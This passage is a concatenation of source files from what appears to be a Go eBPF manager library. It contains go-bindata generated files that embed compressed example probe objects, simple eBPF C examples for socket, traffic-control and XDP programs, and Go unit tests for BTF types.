"\x3a\x8c\x9a\xe2\xbf\xc4\xa6\xc9\x45\xdb\x00\x80\x73\x05\x73\xc9\xfc\x3c\xf1\xdf\xf5\xc9\xe7\x7b\x56\xda\xf7\x28" +
"\x6f\xae\x04\xa5\xdc\x98\x12\x94\x0b\xf0\x4a\x0f\xf6\x12\x00\x46\x61\x38\xf5\x13\x7d\x3f\x65\xf8\x48\x0f\x8e\x3d" +
"\x1c\x25\x79\x93\x3e\x55\x86\x97\x7b\xf0\x75\x86\x67\x79\x93\xbe\x6b\x84\x63\x6a\x27\x58\xde\xec\x63\xd5\xe0\xfb" +
"\x24\x08\xba\x58\x6d\x55\xca\xfc\x91\x3e\xe6\x1b\x64\x1e\xaf\xaa\x8b\xc4\xc7\x6e\x16\x88\xcf\x7a\x55\x03\xfd\x6e" +
"\x00\xea\xcc\xfc\xac\x8a\x03\x22\x47\xb0\x34\xd7\x9f\x24\x80\x0f\xa6\xeb\x39\x8b\x7a\x73\x75\xd9\x6f\x32\x41\x83" +
"\xea\xe9\xed\x18\x9c\xcc\x40\xb2\x8a\xc9\x58\x5c\x15\x83\xa6\xa7\x07\x2e\xae\x23\x2e\x5b\x12\xfb\xcd\x55\xdd\xf3" +
"\x0d\xc7\x86\x66\xdb\x68\xe9\xb6\xaf\xb3\x5d\x54\x7d\xa5\xb9\xec\x69\x96\x0e\x96\x66\xd8\x6a\x0b\x54\x3f\xf0\x02" +
"\x6d\x11\x54\x7f\xcd\x62\xcf\x99\xf9\x59\x50\x3d\x67\x49\x0b\x34\x9c\x9b\x52\xa7\x2e\xe4\xd0\x7f\x60\xeb\x72\xfe" +
"\x44\x5b\xe0\x47\xfe\x59\xc0\xc5\xff\x4d\x24\xfe\x1b\x12\xf0\xe9\x82\x7c\xe2\xfd\x6b\xec\x13\x2f\xbe\x87\x55\x61" +
"\x9d\x0e\x00\x87\x72\xf2\xec\xf0\x0d\x15\xee\xd7\x78\x9f\x55\xe2\xa3\x5d\x2d\xc8\x7f\x5f\xea\x2f\xff\x95\x82\xfc" +
"\xd5\x4a\x6f\xfe\x72\x4e\xfe\x47\x05\xf9\xbb\xfc\x7b\x2c\xde\x33\x62\xfe\x06\x79\x07\xa8\xb9\x1c\x68\x08\xf5\x8b" +
"\xfc\x7f\xe0\xf1\x67\x05\xfc\x31\x5f\xf8\x40\xc0\xd3\x7b\x95\x3f\x5f\x15\xe4\x3f\x56\xce\xcf\x27\xea\xe7\x59\x41" +
"\x7c\xbd\x20\x5e\xf4\xb7\x73\xf6\x44\x6b\xf0\xf8\xb1\x7d\xf2\x57\x0a\xe2\xcf\xf3\x78\x65\x9f\xf8\xb7\xe4\x4e\xa2" +
"\xb6\xc0\xe3\x5d\x01\x17\xcf\xef\x4d\x81\x7e\xc6\xb9\x7e\xce\x70\x1f\x79\x3f\x92\xa3\x9f\xad\x9c\xdc\x0c\x4f\xea" +
"\x27\xf7\x28\xd5\x5f\xf2\x1d\xfc\x1d\x00\x00\xff\xff\x58\x41\x60\x89\x80\x0c\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 3200,
md5checksum: "",
mode: os.FileMode(436),
modTime: time.Unix(1594301585, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/programs/socket/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
SEC("socket/sock_filter")
int socket_sock_filter(void *ctx)
{
bpf_printk("new packet received\n");
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/programs/tracepoint/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\x31\x8b\x13\x41\x14\xfe\x26\x89\xb9\xe8\x9d\x10\xad\xce\x90\x22" +
"\xa5\x16\xce\xdd\x59\x58\x1f\x07\xc6\xe6\x0a\xd1\x94\xca\xba\xee\x8d\xb8\x98\x6c\x64\x67\x10\x73\x11\x04\x41\x10" +
"\x1b\x6d\xac\x4f\x7f\x45\x4a\xff\x82\x3f\xe1\x4a\x41\x8b\x08\x82\x56\xae\xcc\xdc\x9b\x64\x78\xd9\x25\x3e\x98\xcc" +
"\xcc\x37\xf3\xbd\xf7\xbd\x2f\xc3\xbe\xba\x75\xd8\xaf\x09\x01\x1f\x02\xbf\xb1\xdc\x2d\xe3\x53\x6d\xb9\xde\xa7\xdf" +
"\x2d\x08\xcc\x04\x60\xae\x5d\x40\xd2\xf9\x53\x58\x74\x5b\x00\x79\x9c\x28\xbb\x7e\x36\x4e\xb3\x69\x67\xbe\xc0\x55" +
"\x66\x1c\x9e\xf7\xae\x9a\x69\xe7\xdb\x02\x1f\x3d\x3d\x4a\x1d\x1e\x9b\xde\xb4\x73\xea\xf0\x2f\x9f\xcf\x6a\x6d\x08" +
"\xe0\xb4\x28\x8a\x59\x0d\xe8\x02\x78\x03\xa0\x09\x60\x46\x5a\x3e\x32\x9d\x36\x97\xcd\x63\x6b\xd9\x3a\x56\x8b\xd5" +
"\x61\x35\xde\xbe\x73\x88\xbf\x45\x51\x9c\x7c\x17\xd8\x66\x3c\xd7\x73\x78\xd0\x08\x46\x0b\x40\xfb\x0c\x6e\xfb\xfb" +
"\xc7\x77\xd1\x7a\xb9\x29\xb6\x6c\x0f\x34\x7c\xbc\x2d\xf1\x8f\x87\x76\xa9\x7f\x16\x65\x67\x75\xd4\x57\xb0\xfb\x00" +
"\x2e\xe1\xdc\x62\xdf\xa0\xf9\x9e\xc3\x9b\x2b\xb8\xd5\x79\x39\xc8\xe3\x35\x75\x83\x7e\xdd\x5f\x2a\x8d\x7a\x61\x20" +
"\x0f\x06\x7d\x69\x17\x4b\xc3\x22\x3d\xd1\x91\xb3\x31\x22\x53\x83\xc3\x1d\x3d\xd1\x49\x3c\x1c\xea\x9d\xd5\x5b\xd1" +
"\x73\x95\xeb\x74\x9c\x21\x1a\xa6\x89\xca\xb4\x82\xcc\xd5\x50\xaa\x27\xd1\xe3\x3c\x1e\x29\x8c\xe2\x34\x93\x09\xa4" +
"\x36\xb9\x89\x1f\x41\xea\xc9\xc8\xcd\x07\x83\x3e\x64\x3e\x3e\x8a\x4d\x6c\xcf\xf6\xe4\xde\xcd\xff\x30\x72\x4d\x1c" +
"\x3b\x3f\x4b\x82\xde\xf3\x09\x83\xf9\xdb\x17\x34\x9a\x0c\xdf\xaf\xa8\xd7\x60\xfb\xeb\x6b\xf8\xfc\xad\xb4\xd8\xfe" +
"\x3d\xf1\x6f\x30\xfc\x2b\xcd\x5d\x86\xb7\x59\x1f\x0f\x68\xcd\x3d\xf8\x51\xa1\x97\xf7\x3f\xa8\xe0\xcf\x2b\xf8\x7c" +
"\xff\xae\x24\xa7\x8d\x5f\x34\x5f\x59\x53\x7f\xa3\x82\x7f\x91\xc0\xde\x1a\x7e\x1a\xbe\xf5\x20\x76\xe9\xe2\x2e\xc3" +
"\xb9\xff\xf6\x83\x75\xbe\xa4\xfe\x9c\xf8\xde\xef\x4d\xba\xe7\xf9\x1e\x7f\x5d\x52\xdb\xc6\x43\xe2\x7f\x08\x74\xd7" +
"\x03\xbe\xff\x9e\xfc\x0b\x00\x00\xff\xff\x83\x97\x90\xc4\xa0\x05\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1440,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295152, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/programs/kprobe/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x94\x55\xbf\x6b\x14\x4f\x14\xff\xec\x5d\x7e\xdc\xf7\xbe\xc1\x44\xab\xb8" +
"\xa4\x58\x84\x40\xd2\x6c\x12\x09\x92\xc2\x22\x04\x12\x9b\x14\x22\x51\xec\x96\xcd\x65\x42\x96\xbd\xdd\x3d\x76\x27" +
"\x21\xf1\x04\xb5\xb0\xd0\x52\xd0\x56\xad\x2c\xb5\x3b\x0b\xc1\x7f\xc0\x22\x65\xc0\x26\x65\xc0\x26\x82\xa0\x85\x64" +
"\xe5\xcd\xcd\xe4\xe6\xe6\x6e\xbd\xf8\x60\x6f\xde\xfb\xcc\x7c\xde\xcf\xd9\xbd\x47\xab\xeb\x6b\x25\xcb\x82\x12\x0b" +
"\x3f\xd1\xb1\x3a\x72\x32\xd4\xd1\x97\xe5\xef\x38\x2c\x4c\x5a\x40\x23\x09\x62\x42\xf8\x6c\x15\x4d\xfb\x34\x27\x9d" +
"\xf0\xed\xcc\xd9\x21\x3d\x49\x42\xa7\x69\x9f\x9c\xe3\x51\xb8\x15\x90\x9e\x3a\x33\x7b\x4d\xfb\x58\xe0\x9f\xdf\xb6" +
"\x7d\x8f\x5a\xc0\x71\x9e\xe7\xad\x12\x30\x09\xe0\x29\x80\x11\x00\x2d\x19\xfb\xa5\x5c\x5b\x16\x10\x57\x81\xd0\xfe" +
"\x9d\x2b\x3b\x89\xa2\xa4\x66\xff\x3a\x8f\xb3\xcb\x83\x88\x74\x96\x79\x35\x95\x57\x4b\x16\x97\xd9\x67\x3d\x71\x4f" +
"\x65\xdc\xf1\x41\x71\xf9\x6c\xb5\xa6\xd5\xb9\x93\x24\x21\xe9\x4e\x23\x09\xf4\x3a\xb3\x83\xac\x46\xba\x5f\xaf\x3b" +
"\xaa\x4e\xc2\x53\xc6\x77\x45\xfd\xb1\x33\xd3\xb4\x8f\x7a\xfb\xe2\x73\xa7\x69\x1f\x1a\xf9\xfe\xe8\xc9\xf7\x50\xe6" +
"\x3b\xfd\x97\x7c\xc9\x27\xf5\x99\x66\x41\x73\xa0\x59\xd1\x9c\xa0\xef\xfb\xdc\xa1\x9c\x28\x1f\xca\x99\xf2\xed\x3a" +
"\x4c\x8d\xa4\x26\x52\x83\xe3\x2a\x6e\xdd\x5e\xc7\x59\x9e\xe7\xaf\xbf\x59\x62\x46\xba\x88\x74\xf5\x8d\x21\xed\xa9" +
"\x00\x98\x68\xc3\x13\xea\xfc\x83\x3b\xa8\x3c\xfc\xdf\x1a\x43\x7b\xde\xba\xbf\x7d\x4d\x9f\x02\xb0\x58\xb0\xa7\xf6" +
"\x37\x34\xfb\x03\x2e\x26\x6f\x44\x6a\xdf\xf3\x7e\x7b\x65\x94\xfb\x72\xca\x18\x2a\xc0\x87\x7b\xb0\x67\x00\x2e\x8b" +
"\xc2\xdb\xa2\x98\x8f\x05\xfe\x5f\x0f\x7e\x0f\xc0\x15\xcd\xbf\xaa\x73\x51\xe0\xe5\x1e\xfc\x9a\xc0\x3b\x71\x55\xdd" +
"\x53\x72\xa5\x79\x94\x00\x2c\x69\x36\x79\xb9\xaf\xd9\x22\x9a\xcb\xd9\x3e\x87\xbb\xb2\xb1\xe6\x92\x12\xa6\x8c\x37" +
"\xd2\x64\x93\xcd\xc9\x1b\xd2\x46\x92\x4d\xe6\xed\xc6\xf5\x20\x0e\x09\x11\x07\xbc\xbd\xed\xcc\x13\x87\x24\x30\x67" +
"\x02\x5e\xd7\xfd\x51\xa7\xba\x41\x6f\x8f\xa5\x59\x40\x4a\x3d\xa8\xb1\x38\x63\x70\x53\x56\x77\xd9\x8e\xb7\x9d\xfa" +
"\x11\x43\xe4\x07\xb1\x5b\x83\x9b\xf1\x94\xfb\x9b\x70\xb3\x83\x48\xac\x2b\x1b\x6b\x70\xd3\x64\xcb\xe7\x3e\xed\x2d" +
"\xb8\x0b\x37\x0c\xbb\xef\xa8\xfe\x59\xde\xc9\xbe\x99\x52\x91\xa3\xfa\x6a\xe0\xe6\x37\xd4\x92\xcf\x88\x81\x2f\x17" +
"\xc4\x33\x6f\xd8\xea\x00\xbe\xf9\x3e\x54\x0c\x3b\x2c\xe0\x7f\xbc\x20\x7f\xa2\x80\x3f\x2f\x0b\x35\xdf\x37\x93\xff" +
"\x49\xf2\xaf\x1b\xf8\xb1\xe4\xaf\xf6\x89\x07\xad\x8f\x5f\x0a\xf8\xd3\xa5\xf6\x3a\x6e\xe0\x96\xb1\x3e\xd7\xee\xbe" +
"\x2e\x8b\x92\x6f\xf6\xdb\x9c\xdf\x93\x02\xfe\x52\x01\xdf\xb4\x5b\x7d\x7c\x92\xdc\x94\xfc\xab\x03\xe2\x8f\x16\xf0" +
"\xef\x4a\xbe\x33\x80\xff\x4a\xfb\x16\xe8\xb2\x2f\x81\x86\x81\x9b\xf3\x7b\x01\x68\x5f\xab\x8e\x1c\xc9\x86\xcc\x4b" +
"\xfb\x12\x80\x31\x8d\xaf\xe6\xf8\xbe\x4f\x6c\x92\x13\x09\x9e\x6a\x79\x0f\x6b\x7c\xf5\x7f\xf0\x27\x00\x00\xff\xff" +
"\x66\x31\x61\xca\xa8\x08\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 2216,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594312574, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/programs/tc/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
#include <uapi/linux/pkt_cls.h>
SEC("classifier/egress")
int egress_cls_func(struct __sk_buff *skb)
{
bpf_printk("new packet captured on egress (TC)\n");
return TC_ACT_OK;
};
SEC("classifier/ingress")
int ingress_cls_func(struct __sk_buff *skb)
{
bpf_printk("new packet captured on ingress (TC)\n");
return TC_ACT_OK;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/tests_and_benchmarks/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
__attribute__((always_inline)) static int my_func(u32 input)
{
return 2*input;
}
#define TEST_DATA_KEY 1
struct my_func_test_data_t {
u32 input;
u32 output;
};
struct bpf_map_def SEC("maps/my_func_test_data") my_func_test_data = {
.type = BPF_MAP_TYPE_ARRAY,
.key_size = sizeof(u32),
.value_size = sizeof(struct my_func_test_data_t),
.max_entries = 2,
};
SEC("xdp/my_func_test")
int my_func_test(struct __sk_buff *skb)
{
// Retrieve test data
u32 key = TEST_DATA_KEY;
struct my_func_test_data_t *data = bpf_map_lookup_elem(&my_func_test_data, &key);
if (data == NULL) {
bpf_printk("no test data\n");
return -1;
}
u32 ret = my_func(data->input);
if (ret != data->output) {
bpf_printk("expected %d for input %d, got %d\n", data->output, data->input, ret);
return -1;
}
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>internal/btf/types_test.go<|end_filename|>
package btf
import "testing"
import "fmt"
func TestSizeof(t *testing.T) {
testcases := []struct {
size int
typ Type
}{
{1, &Int{Size: 1}},
{4, &Enum{}},
{0, &Array{Type: &Pointer{Target: Void{}}, Nelems: 0}},
{12, &Array{Type: &Enum{}, Nelems: 3}},
}
for _, tc := range testcases {
name := fmt.Sprint(tc.typ)
t.Run(name, func(t *testing.T) {
have, err := Sizeof(tc.typ)
if err != nil {
t.Fatal("Can't calculate size:", err)
}
if have != tc.size {
t.Errorf("Expected size %d, got %d", tc.size, have)
}
})
}
}
func TestCopyType(t *testing.T) {
_ = copyType(Void{})
in := &Int{Size: 4}
out := copyType(in)
in.Size = 8
if size := out.(*Int).Size; size != 4 {
t.Error("Copy doesn't make a copy, expected size 4, got", size)
}
t.Run("cyclical", func(t *testing.T) {
ptr := &Pointer{}
foo := &Struct{
Members: []Member{
{Type: ptr},
},
}
ptr.Target = foo
_ = copyType(foo)
})
}
// The following are valid Types.
//
// There currently is no better way to document which
// types implement an interface.
func ExampleType_validTypes() {
var t Type
t = &Void{}
t = &Int{}
t = &Pointer{}
t = &Array{}
t = &Struct{}
t = &Union{}
t = &Enum{}
t = &Fwd{}
t = &Typedef{}
t = &Volatile{}
t = &Const{}
t = &Restrict{}
t = &Func{}
t = &FuncProto{}
t = &Var{}
t = &Datasec{}
_ = t
}
<|start_filename|>manager/examples/programs/xdp/utils.go<|end_filename|>
package main
import (
"bytes"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"io"
"net/http"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
